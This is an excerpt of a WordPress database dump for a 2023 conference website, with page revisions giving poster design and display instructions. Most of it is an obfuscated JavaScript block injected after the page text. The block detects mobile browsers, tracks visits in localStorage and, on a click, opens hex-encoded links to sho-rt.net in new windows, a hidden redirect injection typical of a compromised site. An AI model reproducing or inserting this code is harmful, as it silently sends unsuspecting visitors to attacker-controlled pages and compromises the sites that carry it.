_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Poster Design and Presentation','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 21:04:17','2023-08-13 21:04:17','',5132,'https://gsw2023.com/?p=5172',0,'revision','',0),
(5174,1,'2023-08-13 21:06:27','2023-08-13 21:06:27','','GSW2023-Program','','inherit','open','closed','','gsw2023-program','','','2023-08-13 21:06:27','2023-08-13 21:06:27','',5122,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program.pdf',0,'attachment','application/pdf',0),
(5175,1,'2023-08-13 21:08:56','2023-08-13 21:08:56','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 21:08:56','2023-08-13 21:08:56','',5132,'https://gsw2023.com/?p=5175',0,'revision','',0),
(5176,1,'2023-08-13 21:11:34','2023-08-13 21:11:34','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <span style=\"color: #0000ff;\"><strong>Here</strong></span>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 